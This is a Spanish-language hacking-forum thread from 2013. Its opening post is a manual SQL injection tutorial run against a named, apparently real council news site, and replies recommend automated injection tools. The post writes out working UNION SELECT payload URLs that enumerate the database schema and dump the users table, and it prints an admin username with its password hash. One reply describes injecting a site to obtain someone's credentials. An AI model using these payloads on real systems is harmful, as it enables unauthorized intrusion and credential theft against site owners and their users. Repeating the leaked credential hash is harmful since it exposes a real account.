comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Sql Injection manualmente (Matabarras-Morenako)

  • 7 Respuestas
  • 3546 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« en: Julio 13, 2013, 09:36:21 am »


Texto escrito en el video:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bueno soy Morenako-Matabarras y les voy a explicar como se realiza un ataque de Sql injecion manualmente.

En primer lugar vamos a la web a la que vamos a realizar la injección.

http://mostalocalcouncil.com/readnews.php?id=

En mi caso está.

Existe varios comentarios, /* -- #

ya que puede ser que con un comentario funcione y otro no.

y varias formas de realizarla, yo les explicare de una forma sencilla


Miraremos aver si es vulnerable facilmente con la tipica comilla simple.

Vemos que nos da el error así que empezemos.


Empezaremos con un - y una id de noticia el 1

y uniremos ya con +union+select+ o simplemente union select o /**/union/**/select/**/0

Hay diversas formas, con diversos comentarios, bueno.

Ahora lo que tenemos que hacer es añadir números hasta que nos desaparezca el error

Vale a partir de 4 nos ha desaparecido el error.

Entonces, ahora es cuando vamos a buscar las tablas de las basesdedatos.

Lo que haremos sera sustutir por uno de esos números por group_concat(table_name)

Una vez echo eso añadimos al final

+from+information_schema.tables -- - , ya que esto no es a ciegas

utilizamos el comentario -- o -- - al final de la consulta.


Vale aqui nos muestra todas las tablas, para mi la más importante y primera a mirar sera users, una cosa he de decirles

Quizas al sustituir el group_concat(table_name) por otro numero, no aparece nada por ejemplo

Por el 0 no nos aparece nada, si cambiamos el 1 por group_concat(table_name) si y si cambiamos el 2 también, es ir probando.

Bueno ya tenemos la tabla users que queremos mirar, así que vamos a transformar


http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -117,115,101,114,115

ahora esto lo ponemos por ,.

Vale, la injeccion de momento la tenemos así

http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -

Ahora lo que haremos es cambiar en group_concat(table_name) por group_concat(column_name)

y information_schema.tables por information_schema.columns y añadiremos


http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115) -- -

Y aparte de  cambiar eso, hemos añadido +where+table_name=char(aqui el codigo en ascii value que nos dio separado por comillas) -- -

Nos da varias columnas

yo mirare la de username y password
Asi que modificamos la consulta. y en group_concat(colum_name)

Column_name lo cambiamos por las columnas que queremos mirar separandolas por una coma y quitamos todo apartir de information_schema poniendo simplemente el nombre de la tabla, que miramos anteriormente que era USERS

http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(username,password),3,4+from+users -- -

admin 68b752263e82b3b1ee1ffe739ee0eec1

Y ya tenemos el usuario y hash de la contraseña

Si queremos miramos el email tambien, y la id

vemos que su id es 2

Bueno,espero que les aña servido el tutorial y lo hayan entendido

Un cordial saludo

Morenako,Matabarras
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado Faquir

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 14, 2013, 04:28:51 am »
 ::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #2 en: Julio 14, 2013, 08:35:46 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•
Debería darte vergüenza decirlo...
Prueba sqlmap.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #3 en: Julio 14, 2013, 09:39:21 am »
Respecto a Faquir , sin comentarios cada cual sabra.

No le veo la gracia a usar una herramienta que te lo automatiza todo, se ve que es la moda.

Tampoco veo mal usarla en casos, donde el objetivo es sacar mucha información en poco tiempo.

Aunque ultimamente la gente ataca por que si, sin objetivo ni motivo alguno, pero bueno.

Espero que les haya gustado la explicación y se me equivocado en algo que me lo digan, no e entrado a especificar , porque queria hacerla sencilla y que se entendiera bien.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado CR1M3N

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Julio 15, 2013, 07:50:01 am »
Para los que les gusta ir directamente al grano, personalmente recomiendo SQLmap, no tiene interfaz gráfica pero es bastante sencillo de usar, y una herramienta muy potente.

Desconectado hum4n3xpl01t

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Julio 17, 2013, 09:05:26 pm »

He utilizado mas de una vez Havij, pero realmente no me gusta realizar inyecciones con herramientas, mi interés es aprender el como funcionan esas herramientas y logran explotar vulnerabilidades.

Excelente explicación, nunca esta demás reforzar el conocimiento.

saludos

Desconectado Assed [In]Seguridad Informática

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
  • ASSED Lab's
    • Ver Perfil
    • Email
  • Skype: @Pep.Juan
« Respuesta #6 en: Julio 30, 2013, 07:57:35 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•

Faquir Hola Pues sinceramente si no lo haces de manual intenta con SQLMAP O THEMOLE , Havij no me gusta de nda así que si lo vas a hacer automatizado hazlo con : sqlmap , necesitaras de python ya que la herramienta es desarrollada por python

Sal2
Passion informatic.

Desconectado Mr. Foster

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Julio 31, 2013, 11:29:39 am »
Porque morenako?

 

¿Te gustó el post? COMPARTILO!



HTML Injection (post para novatos)

Iniciado por Olger346

Respuestas: 1
Vistas: 1378
Último mensaje Diciembre 26, 2017, 11:37:27 am
por DLV
MaxISploit Herramienta Sql Injection - Adm Finder - Xss

Iniciado por ZanGetsu

Respuestas: 3
Vistas: 3762
Último mensaje Septiembre 06, 2013, 03:55:36 pm
por _Kippei_
SQL Injection hasta la cocina - Oracle (I)

Iniciado por morodog

Respuestas: 0
Vistas: 1809
Último mensaje Abril 22, 2013, 12:59:54 pm
por morodog
[Tool] CS-SQL Injection Authentication Bypass

Iniciado por ZanGetsu

Respuestas: 0
Vistas: 1324
Último mensaje Junio 14, 2017, 12:48:30 am
por ZanGetsu
Explotando SSI Injection desde 0

Iniciado por HATI

Respuestas: 6
Vistas: 2296
Último mensaje Noviembre 26, 2017, 07:07:53 am
por HATI